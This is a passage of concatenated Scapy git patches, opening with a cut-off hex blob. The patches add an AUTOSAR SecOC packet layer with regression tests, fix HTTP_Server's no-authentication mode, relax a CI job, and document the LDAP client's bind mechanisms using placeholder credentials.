b61910357a5940a3c3f186eb07a37968c7f17b5614603aae4e71cb2d5f122bbea187888452239cb9c0d338d913604034e4eb3be2639a15836d08b4b4f38287414e5cd144a23aa95edb59236205397263ead5b0ef1a2239f54149f9b5992a2964a28373652a1bb31a772a04c5d4eef2fd0e5853094590ccc5b1bcb9fc1910d31652cc8f2e72c685665834f3826613dd456655ae9c9f21283a1684123fa144bc3276f50ead086fd9c149b670b27804057472602a984a3de016f65bf0980baa8a0cbadd53b061800347fec63d80b0b68d164e295e682a890ae433c439ae04a31dd8b9260c81692a110e8583038e767ceab2b87db2067eeb1973aa5bbcd5f3b4fca071ca60361d9815e87c76c44e9791c7aa25defaaaa28d72c709ad434b44974ed50546b685e215c7a70065503f0014d5f9f1fdf851930af51e7c425d0ea0d966377f44d60bf6345a05d750d2de25ebb1957bdac56b1d9a3a4e556bf398e063062ea7e1400a279abb085c1fadb9e517231b5fdcb0d868c10c00016903001861040089499a5bf709647d1cd5e41d381c15ab96100c86f0d66d0ba53a224b2adb7897f63de0368a080e17e80da5f70505d58c5317cb047dfeeecc1c7e160fdbf4747c78fb2641b233ad509c12de3a83c3d9cab174c8ca3a748d43766a11eeaa3e8c080401006f041a8741e47e744c7b6b83abf44bc722ae7f1ca19e12989106c2a78a37c8713cac664d1d1dbff6a566b05f478f15123fb155850cafeb36120e9fb24ae4fc5f4c6e4614ebcaf1dab4a79405325d4774cef1c85facffdf57c182c7e22d29facb2ee7460b716aaa6b5e3235036d21a6212414f2d75fc85caa91317fcd0318c651f8459f32bfbda3f3b2e04c1f0c2f8982ea16d2df599133881106b27d53276703bc43230f0fdcadb8b1fe13101d1055a14d6cc6af8fa48d6dd23a0a36fb5d6ebb8f5021e3e20900b5de2442da9853d2446d75b1c2198d24cdc2a5a3d07a9aab451e196c6c49fce20bdb71a7190de2964afd934a7f14afb7872a49ab6a7a5cf2d30e000000' From 651df57175d5970d5842d28e471045c1553b9f00 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 15 Jun 2024 19:44:25 +0200 Subject: [PATCH 1297/1632] Allow failure of codecov job (#4430) Because it just keeps failing --- .github/workflows/unittests.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index d65fe73b615..79997e0045d 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -137,6 +137,7 @@ jobs: run: UT_FLAGS="${{ matrix.flags }}" ./.config/ci/test.sh ${{ matrix.python }} ${{ matrix.mode }} - name: Codecov uses: codecov/codecov-action@v4 + continue-on-error: true with: token: ${{ secrets.CODECOV_TOKEN }} From de363371f972a04870f7e19b938924bb2e9ca240 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 17 Jun 2024 10:00:08 +0200 Subject: [PATCH 1298/1632] Add basic implementation of AUTOSAR SecOC (#4395) * initial * wip * Update secOC * minor changes * minor fixes * testing a fix * testing a fix * more testing * bugfix * update * applied feedback --- scapy/contrib/automotive/autosar/pdu.py | 4 +- scapy/contrib/automotive/autosar/secoc.py | 178 ++++++++++++++++++++ test/contrib/automotive/autosar/pdu.uts | 2 +- test/contrib/automotive/autosar/secoc.uts | 194 ++++++++++++++++++++++ 4 files changed, 375 insertions(+), 3 deletions(-) create mode 100644 scapy/contrib/automotive/autosar/secoc.py create mode 100644 test/contrib/automotive/autosar/secoc.uts diff --git a/scapy/contrib/automotive/autosar/pdu.py b/scapy/contrib/automotive/autosar/pdu.py index 8ff3805764f..9d88b355c2d 100644 --- a/scapy/contrib/automotive/autosar/pdu.py +++ b/scapy/contrib/automotive/autosar/pdu.py @@ -9,7 +9,7 @@ # scapy.contrib.status = loads from typing import Tuple, Optional from scapy.layers.inet import UDP -from scapy.fields import IntField, XIntField, PacketListField +from scapy.fields import XIntField, PacketListField, LenField from scapy.packet import Packet, bind_bottom_up @@ -26,7 +26,7 @@ class PDU(Packet): name = 'PDU' fields_desc = [ XIntField('pdu_id', 0), - IntField('pdu_payload_len', 0)] + LenField('pdu_payload_len', None, fmt="I")] def extract_padding(self, s): # type: (bytes) -> Tuple[bytes, Optional[bytes]] diff --git a/scapy/contrib/automotive/autosar/secoc.py b/scapy/contrib/automotive/autosar/secoc.py new file mode 100644 index 00000000000..867f6e8134f --- /dev/null +++ b/scapy/contrib/automotive/autosar/secoc.py @@ -0,0 +1,178 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Nils Weiss + +# scapy.contrib.description = AUTOSAR Secure On-Board Communication +# scapy.contrib.status = loads + +""" +SecOC +""" +import struct + +from scapy.config import conf +from scapy.error import log_loading + +if conf.crypto_valid: + from cryptography.hazmat.primitives import cmac + from cryptography.hazmat.primitives.ciphers import algorithms +else: + log_loading.info("Can't import python-cryptography v1.7+. " + "Disabled SecOC calculate_cmac.") + +from scapy.base_classes import Packet_metaclass +from scapy.config import conf +from scapy.contrib.automotive.autosar.pdu import PDU +from scapy.fields import (XByteField, XIntField, PacketListField, + FieldLenField, PacketLenField, XStrFixedLenField) +from scapy.packet import Packet, Raw + +# Typing imports +from typing import ( + Any, + Callable, + Dict, + Optional, + Set, + Tuple, + Type, +) + + +class PduPayloadField(PacketLenField): + + __slots__ = ["guess_pkt_cls"] + + def __init__(self, + name, # type: str + default, # type: Packet + guess_pkt_cls, # type: Callable[[Packet, bytes], Packet] # noqa: E501 + length_from=None # type: Optional[Callable[[Packet], int]] # noqa: E501 + ): + # type: (...) -> None + super(PacketLenField, self).__init__(name, default, Raw) + self.length_from = length_from or (lambda x: 0) + self.guess_pkt_cls = guess_pkt_cls + + def m2i(self, pkt, m): # type: ignore + # type: (Optional[Packet], bytes) -> Packet + return self.guess_pkt_cls(pkt, m) + + +class SecOC_PDU(Packet): + name = 'SecOC_PDU' + fields_desc = [ + XIntField('pdu_id', 0), + FieldLenField('pdu_payload_len', None, + fmt="I", + length_of="pdu_payload", + adjust=lambda pkt, x: x + 4), + PduPayloadField('pdu_payload', + Raw(), + guess_pkt_cls=lambda pkt, data: SecOC_PDU.get_pdu_payload_cls(pkt, data), # noqa: E501 + length_from=lambda pkt: pkt.pdu_payload_len - 4), + XByteField("tfv", 0), # truncated freshness value + XStrFixedLenField("tmac", None, length=3)] # truncated message authentication code # noqa: E501 + + pdu_payload_cls_by_identifier: Dict[int, Type[Packet]] = dict() + secoc_protected_pdus_by_identifier: Set[int] = set() + + def secoc_authenticate(self) -> None: + self.tfv = struct.unpack(">B", self.get_secoc_freshness_value()[-1:])[0] + self.tmac = self.get_message_authentication_code()[0:3] + + def secoc_verify(self) -> bool: + return self.get_message_authentication_code()[0:3] == self.tmac + + def get_secoc_payload(self) -> bytes: + """Override this method for customization + """ + return self.pdu_payload + + def get_secoc_key(self) -> bytes: + """Override this method for customization + """ + return b"\x00" * 16 + + def get_secoc_freshness_value(self) -> bytes: + """Override this method for customization + """ + return b"\x00" * 4 + + def get_message_authentication_code(self): + payload = self.get_secoc_payload() + key = self.get_secoc_key() + freshness_value = self.get_secoc_freshness_value() + return self.calculate_cmac(key, payload, freshness_value) + + @staticmethod + def calculate_cmac(key: bytes, payload: bytes, freshness_value: bytes) -> bytes: + c = cmac.CMAC(algorithms.AES128(key)) + c.update(payload + freshness_value) + return c.finalize() + + @classmethod + def register_secoc_protected_pdu(cls, + pdu_id: int, + pdu_payload_cls: Type[Packet] = Raw + ) -> None: + cls.secoc_protected_pdus_by_identifier.add(pdu_id) + cls.pdu_payload_cls_by_identifier[pdu_id] = pdu_payload_cls + + @classmethod + def unregister_secoc_protected_pdu(cls, pdu_id: int) -> None: + cls.secoc_protected_pdus_by_identifier.remove(pdu_id) + del cls.secret_keys_by_identifier[pdu_id] + + @classmethod + def dispatch_hook(cls, s=None, *_args, **_kwds): + # type: (Optional[bytes], Any, Any) -> Packet_metaclass + """dispatch_hook determines if PDU is protected by SecOC. + If PDU is protected, SecOC_PDU will be returned, otherwise AutoSAR PDU + will be returned. + """ + if s is None: + return SecOC_PDU + if len(s) < 4: + return Raw + identifier = struct.unpack('>I', s[0:4])[0] + if identifier in cls.secoc_protected_pdus_by_identifier: + return SecOC_PDU + else: + return PDU + + @staticmethod + def get_pdu_payload_cls(pkt: Packet, + data: bytes + ) -> Packet: + try: + cls = SecOC_PDU.pdu_payload_cls_by_identifier[pkt.pdu_id] + except KeyError: + cls = conf.raw_layer + return cls(data, _parent=pkt) + + def extract_padding(self, s): + # type: (bytes) -> Tuple[bytes, Optional[bytes]] + return b"", s + + +class SecOC_PDUTransport(Packet): + """ + Packet representing SecOC_PDUTransport containing multiple PDUs + """ + + name = 'SecOC_PDUTransport' + fields_desc = [ + PacketListField("pdus", [SecOC_PDU()], pkt_cls=SecOC_PDU) + ] + + @staticmethod + def register_secoc_protected_pdu(pdu_id: int, + pdu_payload_cls: Type[Packet] = Raw + ) -> None: + SecOC_PDU.register_secoc_protected_pdu(pdu_id, pdu_payload_cls) + + @staticmethod + def unregister_secoc_protected_pdu(pdu_id: int) -> None: + SecOC_PDU.unregister_secoc_protected_pdu(pdu_id) diff --git a/test/contrib/automotive/autosar/pdu.uts b/test/contrib/automotive/autosar/pdu.uts index 3167cdd8142..67278216b87 100644 --- a/test/contrib/automotive/autosar/pdu.uts +++ b/test/contrib/automotive/autosar/pdu.uts @@ -20,7 +20,7 @@ assert p.pdus == [PDU()] p = PDU() assert p.pdu_id == 0 -assert p.pdu_payload_len == 0 +assert p.pdu_payload_len == None = Build test pdu_id p = PDU(bytes(PDU(pdu_id=0x11))) diff --git a/test/contrib/automotive/autosar/secoc.uts b/test/contrib/automotive/autosar/secoc.uts new file mode 100644 index 00000000000..45c3cd5adcf --- /dev/null +++ b/test/contrib/automotive/autosar/secoc.uts @@ -0,0 +1,194 @@ +% Regression tests for the SecOC_PDUTransport / SecOC_PDU layer + + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ + ++ SecOC_PDUTransport contrib tests + += Load Contrib Layer + +load_contrib("automotive.autosar.secoc") + += Prepare SecOC keys + +SecOC_PDU.secoc_protected_pdus_by_identifier = {0, 1, 2, 3, 17, 18} +SecOC_PDU.register_secoc_protected_pdu(0xdeadbeef) + +class PDU_Payload(Packet): + fields_desc = [ + ByteField("a", 0), + ByteField("b", 0), + ByteField("c", 0) + ] + + +class PDU_Payload2(Packet): + fields_desc = [ + ByteField("x", 0), + ByteField("y", 0), + ByteField("z", 0) + ] + + +SecOC_PDUTransport.register_secoc_protected_pdu(32, PDU_Payload) +SecOC_PDUTransport.register_secoc_protected_pdu(64, PDU_Payload2) + + += Defaults test +p = SecOC_PDUTransport() +p.show() +assert p.pdus == [SecOC_PDU()] + +p = SecOC_PDU() +assert p.pdu_id == 0 +assert p.pdu_payload_len == None + + += Build test pdu_id +p = SecOC_PDU(bytes(SecOC_PDU(pdu_id=0x11))) +assert len(bytes(p)) == 12 +assert p.pdu_id == 0x11 +assert p.pdu_payload_len == 4 + + += Build test pdu_payload_len +p1 = bytes(SecOC_PDU(pdu_payload_len=12, pdu_payload=bytes.fromhex("1122334455667788"))) +print(p1.hex()) +p = SecOC_PDU(p1) +p.show() +assert len(p) == 20 +assert p.pdu_id == 0 +assert p.pdu_payload_len == 12 +assert bytes(p.pdu_payload) == bytes.fromhex("1122334455667788") +assert p.tfv == 0 +assert p.tmac == b"\x00\x00\x00" + + += Build test pdu_payload_len2 +p1 = bytes(SecOC_PDU(pdu_id=0xdeadbeef, pdu_payload_len=12, pdu_payload=bytes.fromhex("1122334455667788"), tfv=42)) +print(p1.hex()) +p = SecOC_PDU(p1) +p.show() +assert len(p) == 20 +assert p.pdu_id == 0xdeadbeef +assert p.pdu_payload_len == 12 +assert bytes(p.pdu_payload) == bytes.fromhex("1122334455667788") +assert p.tfv == 42 +assert p.tmac == b"\x00\x00\x00" + + += Build test id and payload len with data +p = SecOC_PDU(bytes(SecOC_PDU(pdu_id=0x12, pdu_payload=b'\x22\x33\x22\x33'))) +assert len(p) == 16 +assert p.pdu_id == 0x12 +print(p.pdu_payload) +p.show() +assert p.pdu_payload_len == 8 +assert len(p.pdu_payload) == 4 +assert bytes(p.pdu_payload) == b'\x22\x33\x22\x33' + + += Build SecOC_PDUTransport with multiple SecOC_PDU packets +p1 = SecOC_PDUTransport( + b'\x00\x00\x00\x01\x00\x00\x00\x05\x11\x00\x00\x00\x00' + b'\x00\x00\x00\x02\x00\x00\x00\x06\x11\x44\x00\x00\x00\x00' + b'\x00\x00\x00\x03\x00\x00\x00\x07\x11\x33\x91\x00\x00\x00\x00') + +# Check if fields are set correctly within SecOC_PDU list +assert p1.pdus[0].pdu_id == 0x1 +assert p1.pdus[0].pdu_payload_len == 5 +assert p1.pdus[1].pdu_id == 0x2 +assert p1.pdus[1].pdu_payload_len == 6 +assert p1.pdus[2].pdu_id == 0x3 +assert p1.pdus[2].pdu_payload_len == 7 + +p2 = SecOC_PDUTransport(bytes(SecOC_PDUTransport( + pdus=[ + SecOC_PDU(pdu_id=0x1,pdu_payload_len=5, pdu_payload=Raw(b'\x11')), + SecOC_PDU(pdu_id=0x2, pdu_payload_len=6, pdu_payload=Raw(b'\x11\x44')), + SecOC_PDU(pdu_id=0x3, pdu_payload_len=7, pdu_payload=Raw(b'\x11\x33\x91')) + ]))) +# Check if packets are the same +assert p1 == p2 + + += Build SecOC_PDUTransport with one SecOC_PDU packet +p1 = SecOC_PDUTransport(b'\x00\x00\x00\x01\x00\x00\x00\x08\xaa\xaa\xaa\xaa\x11\x22\x33\x44') +p2 = SecOC_PDUTransport(bytes(SecOC_PDUTransport(pdus=[SecOC_PDU(pdu_id=0x1, pdu_payload=Raw(b'\xaa\xaa\xaa\xaa'), tfv=0x11, tmac=b"\x22\x33\x44")]))) + +# Check if packets are the same +assert p1 == p2 +# Check if fields are set correctly within SecOC_PDU list +assert p1.pdus[0].pdu_id == 0x1 +assert p1.pdus[0].pdu_payload_len == 8 + + += Build SecOC_PDUTransport with one SecOC_PDU packet and custom class +p1 = SecOC_PDUTransport(b'\x00\x00\x00\x20\x00\x00\x00\x07\xaa\xbb\xcc\x11\x22\x33\x44') + +# Check if packets are the same +assert p1 +# Check if fields are set correctly within SecOC_PDU list +assert p1.pdus[0].pdu_id == 0x20 +assert p1.pdus[0].pdu_payload_len == 7 +assert p1.pdus[0].tmac == b"\x22\x33\x44" +pdu = p1.pdus[0] +pdu.show() +assert pdu.pdu_payload.a == 0xaa +assert pdu.pdu_payload.b == 0xbb +assert pdu.pdu_payload.c == 0xcc + + += Build SecOC_PDUTransport with multiple SecOC_PDU packets +p1 = SecOC_PDUTransport(bytes.fromhex("00000020 00000007 aabbcc 11223344 00000040 00000007 ddeeff 55667788 000000ff 00000008 01234567 11223344 000000ff 00000008 01234567 11223344")) +p1.show() +# Check if packets are the same +assert p1 +# Check if fields are set correctly within SecOC_PDU list +assert p1.pdus[0].pdu_id == 0x20 +assert p1.pdus[1].pdu_id == 0x40 +assert p1.pdus[2].pdu_id == 0xff +assert p1.pdus[3].pdu_id == 0xff +assert p1.pdus[0].pdu_payload_len == 7 +assert p1.pdus[1].pdu_payload_len == 7 +assert p1.pdus[2].pdu_payload_len == 8 +assert p1.pdus[3].pdu_payload_len == 8 +assert p1.pdus[0].tmac == b"\x22\x33\x44" + +try: + assert p1.pdus[2].tmac == b"\x22\x33\x44" + assert False +except AttributeError: + pass + +assert p1.pdus[1].tmac == b"\x66\x77\x88" + +pdu = p1.pdus[0] +pdu.show() +assert pdu.pdu_payload.a == 0xaa +assert pdu.pdu_payload.b == 0xbb +assert pdu.pdu_payload.c == 0xcc + +pdu = p1.pdus[1] +pdu.show() +assert pdu.pdu_payload.x == 0xdd +assert pdu.pdu_payload.y == 0xee +assert pdu.pdu_payload.z == 0xff + +pdu = p1.pdus[2] +assert "PDU" in pdu.__class__.__name__ +assert pdu.payload.__class__.__name__ == "Raw" +assert pdu.load == bytes.fromhex("0123456711223344") + + +pdu = p1.pdus[3] +assert "PDU" in pdu.__class__.__name__ +assert pdu.payload.__class__.__name__ == "Raw" +assert pdu.load == bytes.fromhex("0123456711223344") + + + From 8d35918b0847e57388a9418748f7d17c2da8925d Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 20 Jun 2024 07:59:58 +0200 Subject: [PATCH 1299/1632] Bugfix in HTTP_Server: HTTP_Server without authentication (HTTP_AUTH_MECHS.NONE) was broken. (#4433) --- scapy/layers/http.py | 6 ++++-- test/scapy/layers/http.uts | 12 ++++++++++++ 2 files changed, 16 insertions(+), 2 deletions(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 8a12fdf31a4..bb563464981 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -1022,7 +1022,7 @@ def BEGIN(self): @ATMT.condition(BEGIN, prio=0) def should_authenticate(self): - if self.authmethod == HTTP_AUTH_MECHS.NONE: + if self.authmethod == HTTP_AUTH_MECHS.NONE.value: raise self.SERVE() else: raise self.AUTH() @@ -1147,7 +1147,9 @@ def CLOSED(self): # Serving @ATMT.state() - def SERVE(self, pkt): + def SERVE(self, pkt=None): + if pkt is None: + return answer = self.answer(pkt) if answer: self.send(answer) diff --git a/test/scapy/layers/http.uts b/test/scapy/layers/http.uts index 5d5a4642530..5e34c44a549 100644 --- a/test/scapy/layers/http.uts +++ b/test/scapy/layers/http.uts @@ -353,3 +353,15 @@ with run_httpserver(mech=HTTP_AUTH_MECHS.BASIC, BASIC_IDENTITIES={"user": "passw html = f.read().decode('utf-8') assert html == "

      OK

      " + + += HTTP_Server with native python client without auth +~ http-client + +import urllib.request + +with run_httpserver(mech=HTTP_AUTH_MECHS.NONE): + with urllib.request.urlopen('http://127.0.0.1:8080/') as f: + html = f.read().decode('utf-8') + +assert html == "

      OK

      " From 7dcb5fea8f40728969dd373aefc999da1a687040 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 13 Jun 2024 17:16:44 +0200 Subject: [PATCH 1300/1632] Windows improvements: LDAP, Kerberos, X509 --- doc/scapy/layers/ldap.rst | 202 +++++++++++++++ scapy/asn1/asn1.py | 24 +- scapy/asn1/mib.py | 43 +++- scapy/asn1fields.py | 19 ++ scapy/fields.py | 6 + scapy/layers/dcerpc.py | 9 +- scapy/layers/gssapi.py | 53 +++- scapy/layers/kerberos.py | 89 ++++--- scapy/layers/ldap.py | 437 ++++++++++++++++++++++++--------- scapy/layers/ntlm.py | 3 + scapy/layers/smb2.py | 4 + scapy/layers/spnego.py | 29 ++- scapy/layers/tls/cert.py | 4 + scapy/layers/x509.py | 106 ++++---- scapy/sessions.py | 9 + test/regression.uts | 12 + test/scapy/layers/kerberos.uts | 8 +- test/scapy/layers/x509.uts | 29 +++ 18 files changed, 864 insertions(+), 222 deletions(-) create mode 100644 doc/scapy/layers/ldap.rst diff --git a/doc/scapy/layers/ldap.rst b/doc/scapy/layers/ldap.rst new file mode 100644 index 00000000000..6a14102f049 --- /dev/null +++ b/doc/scapy/layers/ldap.rst @@ -0,0 +1,202 @@ +LDAP +==== + +Scapy fully implements the LDAPv2 / LDAPv3 messages, in addition to a very basic :class:`~scapy.layers.ldap.LDAP_Client` class. + +.. warning:: + *The String Representation of LDAP Search Filters* (RFC2254) is currently **unsupported**. + This means that you can't use the commonly known LDAP search syntax, and instead have to use the binary format. + PRs are welcome ! + +LDAP client usage +----------------- + +The general idea when using the :class:`~scapy.layers.ldap.LDAP_Client` class comes down to: + +- instantiating the class +- calling :func:`~scapy.layers.ldap.LDAP_Client.connect` with the IP (this is where to specify whether to use SSL or not) +- calling :func:`~scapy.layers.ldap.LDAP_Client.bind` (this is where to specify a SSP if authentication is desired) + +The simplest, unauthenticated demo of the client would be something like: + +.. code:: pycon + + >>> client = LDAP_Client() + >>> client.connect("192.168.0.100") + >>> client.bind(LDAP_BIND_MECHS.NONE) + >>> client.sr1(LDAP_SearchRequest()).show() + ┃ Connecting to 192.168.0.100 on port 389... + └ Connected from ('192.168.0.102', 40228) + NONE bind succeeded ! + >> LDAP_SearchRequest + << LDAP_SearchResponseEntry + ###[ LDAP ]### + messageID = 0x1 + \protocolOp\ + |###[ LDAP_SearchResponseEntry ]### + | objectName= + | \attributes\ + | |###[ LDAP_SearchResponseEntryAttribute ]### + | | type = + | | \values \ + | | |###[ LDAP_SearchResponseEntryAttributeValue ]### + | | | value = + | |###[ LDAP_SearchResponseEntryAttribute ]### + | | type = + | | \values \ + | | |###[ LDAP_SearchResponseEntryAttributeValue ]### + | | | value = + | |###[ LDAP_SearchResponseEntryAttribute ]### + | | type = + | | \values \ + | | |###[ LDAP_SearchResponseEntryAttributeValue ]### + | | | value = + [...] + +Connecting +~~~~~~~~~~ + +Let's first instantiate the :class:`~scapy.layers.ldap.LDAP_Client`, and connect to a server over the default port (389): + +.. code:: python + + client = LDAP_Client() + client.connect("192.168.0.100") + +It is also possible to use TLS when connecting to the server. + +.. code:: python + + client = LDAP_Client() + client.connect("192.168.0.100", use_ssl=True) + +In that case, the default port is 636. This can be changed using the ``port`` attribute. + +.. note:: + By default, the server certificate is NOT checked when using this mode, because the server certificate will likely be self-signed. + To actually use TLS securely, you should pass a ``sslcontext`` as shown below: + +.. code:: python + + import ssl + client = LDAP_Client() + sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + sslcontext.load_verify_locations('path/to/ca.crt') + client.connect("192.168.0.100", use_ssl=True, sspcontext=sslcontext) + +.. note:: If the client is too verbose, you can pass ``verb=False`` when instantiating :class:`~scapy.layers.ldap.LDAP_Client`. + +Binding +~~~~~~~ + +When binding, you must specify a *mechanism type*. This type comes from the :class:`~scapy.layers.ldap.LDAP_BIND_MECHS` enumeration, which contains: + +- :attr:`~scapy.layers.ldap.LDAP_BIND_MECHS.NONE`: an unauthenticated bind. +- :attr:`~scapy.layers.ldap.LDAP_BIND_MECHS.SIMPLE`: the simple bind mechanism. Credentials are sent **in plaintext**. +- :attr:`~scapy.layers.ldap.LDAP_BIND_MECHS.SICILY`: a `Windows specific authentication mechanism specified in [MS-ADTS] `_ that only supports NTLM. +- :attr:`~scapy.layers.ldap.LDAP_BIND_MECHS.SASL_GSSAPI`: the SASL authentication mechanism, as specified by `RFC 4422 `_. +- :attr:`~scapy.layers.ldap.LDAP_BIND_MECHS.SASL_GSS_SPNEGO`: the SPNEGO authentication mechanism, another `Windows specific authentication mechanism specified in [MS-SPNG] `_. + +Depending on the server that you are talking to, some of those mechanisms might not be available. This is most notably the case of :attr:`~scapy.layers.ldap.LDAP_BIND_MECHS.SICILY` and :attr:`~scapy.layers.ldap.LDAP_BIND_MECHS.SASL_GSS_SPNEGO` which are mostly Windows-specific. + +We'll now go over "how to bind" using each one of those mechanisms: + +**NONE (Unauthenticated):** + +.. code:: python + + client.bind(LDAP_BIND_MECHS.NONE) + +**SIMPLE:** + +.. code:: python + + client.bind( + LDAP_BIND_MECHS.SIMPLE, + simple_username="Administrator", + simple_password="Password1!", + ) + +**SICILY - NTLM:** + +.. code:: python + + ssp = NTLMSSP(UPN="Administrator", PASSWORD="Password1!") + client.bind( + LDAP_BIND_MECHS.SICILY, + ssp=ssp, + ) + +**SASL_GSSAPI - Kerberos:** + +.. code:: python + + ssp = KerberosSSP(UPN="Administrator@domain.local", PASSWORD="Password1!", + SPN="ldap/dc1.domain.local") + client.bind( + LDAP_BIND_MECHS.SASL_GSSAPI, + ssp=ssp, + ) + +**SASL_GSS_SPNEGO - NTLM / Kerberos:** + +.. code:: python + + ssp = SPNEGOSSP([ + NTLMSSP(UPN="Administrator", PASSWORD="Password1!"), + KerberosSSP(UPN="Administrator@domain.local", PASSWORD="Password1!", + SPN="ldap/dc1.domain.local"), + ]) + client.bind( + LDAP_BIND_MECHS.SASL_GSS_SPNEGO, + ssp=ssp, + ) + +Signing / Encryption +~~~~~~~~~~~~~~~~~~~~ + +Additionally, it is possible to enable signing or encryption of the LDAP data, when LDAPS is NOT in use. +This is done by setting ``sign`` and ``encrypt`` parameters of the :func:`~scapy.layers.ldap.LDAP_Client.bind` function. + +There are however a few caveats to note: + +- It's not possible to use those flags in ``NONE`` (duh) or ``SIMPLE`` mode. +- When using the :class:`~scapy.layers.ntlm.NTLMSSP` (in :attr:`~scapy.layers.ldap.LDAP_BIND_MECHS.SICILY` or :attr:`~scapy.layers.ldap.LDAP_BIND_MECHS.SASL_GSS_SPNEGO` mode), it isn't possible to use ``sign`` without ``encrypt``, because Windows doesn't implement it. + +Querying +~~~~~~~~ + +Once the LDAP connection is bound, it becomes possible to perform requests. For instance, to query all the values of the root DSE: + +.. code:: python + + client.sr1(LDAP_SearchRequest()).show() + +Querying more complicated requests is a bit tedious, as it *currently* requires you to build the Search request yourself. +For instance, this corresponds to querying the DN ``CN=Users,DC=domain,DC=local`` with the filter ``(objectCategory=person)`` and asking for the attributes ``objectClass,name,description,canonicalName``: + +.. code:: python + + resp = client.sr1( + LDAP_SearchRequest( + filter=LDAP_Filter( + filter=LDAP_FilterEqual( + attributeType=ASN1_STRING(b'objectCategory'), + attributeValue=ASN1_STRING(b'person') + ) + ), + attributes=[ + LDAP_SearchRequestAttribute(type=ASN1_STRING(b'objectClass')), + LDAP_SearchRequestAttribute(type=ASN1_STRING(b'name')), + LDAP_SearchRequestAttribute(type=ASN1_STRING(b'description')), + LDAP_SearchRequestAttribute(type=ASN1_STRING(b'canonicalName')) + ], + baseObject=ASN1_STRING(b'CN=Users,DC=domain,DC=local'), + scope=ASN1_ENUMERATED(1), + derefAliases=ASN1_ENUMERATED(0), + sizeLimit=ASN1_INTEGER(1000), + timeLimit=ASN1_INTEGER(60), + attrsOnly=ASN1_BOOLEAN(0) + ) + ) + resp.show() diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index 5df2810efe4..0783a3b3a77 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -88,11 +88,9 @@ def _fix(self, n=0): if issubclass(o, ASN1_INTEGER): return o(int(random.gauss(0, 1000))) elif issubclass(o, ASN1_IPADDRESS): - z = RandIP()._fix() - return o(z) - elif issubclass(o, ASN1_GENERALIZED_TIME) or issubclass(o, ASN1_UTC_TIME): # noqa: E501 - z = GeneralizedTime()._fix() - return o(z) + return o(RandIP()._fix()) + elif issubclass(o, ASN1_GENERALIZED_TIME) or issubclass(o, ASN1_UTC_TIME): + return o(GeneralizedTime()._fix()) elif issubclass(o, ASN1_STRING): z1 = int(random.expovariate(0.05) + 1) return o("".join(random.choice(self.chars) for _ in range(z1))) @@ -712,6 +710,22 @@ class ASN1_UNIVERSAL_STRING(ASN1_STRING): class ASN1_BMP_STRING(ASN1_STRING): tag = ASN1_Class_UNIVERSAL.BMP_STRING + def __setattr__(self, name, value): + # type: (str, Any) -> None + if name == "val": + if isinstance(value, str): + value = value.encode("utf-16be") + object.__setattr__(self, name, value) + else: + object.__setattr__(self, name, value) + + def __repr__(self): + # type: () -> str + return "<%s[%r]>" % ( + self.__dict__.get("name", self.__class__.__name__), + self.val.decode("utf-16be"), # type: ignore + ) + class ASN1_SEQUENCE(ASN1_Object[List[Any]]): tag = ASN1_Class_UNIVERSAL.SEQUENCE diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index 57ec5de111d..7f8854b7669 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -210,6 +210,7 @@ def load_mib(filenames): # pkcs1 # pkcs1_oids = { + "1.2.840.113549.1.1": "pkcs1", "1.2.840.113549.1.1.1": "rsaEncryption", "1.2.840.113549.1.1.2": "md2WithRSAEncryption", "1.2.840.113549.1.1.3": "md4WithRSAEncryption", @@ -229,12 +230,40 @@ def load_mib(filenames): # secsig oiw # secsig_oids = { - "1.3.14.3.2.26": "sha1" + "1.3.14.3.2": "OIWSEC", + "1.3.14.3.2.2": "md4RSA", + "1.3.14.3.2.3": "md5RSA", + "1.3.14.3.2.4": "md4RSA2", + "1.3.14.3.2.6": "desECB", + "1.3.14.3.2.7": "desCBC", + "1.3.14.3.2.8": "desOFB", + "1.3.14.3.2.9": "desCFB", + "1.3.14.3.2.10": "desMAC", + "1.3.14.3.2.11": "rsaSign", + "1.3.14.3.2.12": "dsa", + "1.3.14.3.2.13": "shaDSA", + "1.3.14.3.2.14": "mdc2RSA", + "1.3.14.3.2.15": "shaRSA", + "1.3.14.3.2.16": "dhCommMod", + "1.3.14.3.2.17": "desEDE", + "1.3.14.3.2.18": "sha", + "1.3.14.3.2.19": "mdc2", + "1.3.14.3.2.20": "dsaComm", + "1.3.14.3.2.21": "dsaCommSHA", + "1.3.14.3.2.22": "rsaXchg", + "1.3.14.3.2.23": "keyHashSeal", + "1.3.14.3.2.24": "md2RSASign", + "1.3.14.3.2.25": "md5RSASign", + "1.3.14.3.2.26": "sha1", + "1.3.14.3.2.27": "dsaSHA1", + "1.3.14.3.2.28": "dsaCommSHA1", + "1.3.14.3.2.29": "sha1RSASign", } # pkcs9 # pkcs9_oids = { + "1.2.840.113549.1.9": "pkcs9", "1.2.840.113549.1.9.0": "modules", "1.2.840.113549.1.9.1": "emailAddress", "1.2.840.113549.1.9.2": "unstructuredName", @@ -361,7 +390,9 @@ def load_mib(filenames): "2.5.4.94": "epcInUrn", "2.5.4.95": "ldapUrl", "2.5.4.96": "ldapUrl", - "2.5.4.97": "organizationIdentifier" + "2.5.4.97": "organizationIdentifier", + # RFC 4519 + "0.9.2342.19200300.100.1.25": "dc", } certificateExtension_oids = { @@ -430,7 +461,13 @@ def load_mib(filenames): "2.5.29.66": "id-ce-groupAC", "2.5.29.67": "id-ce-allowedAttAss", "2.5.29.68": "id-ce-attributeMappings", - "2.5.29.69": 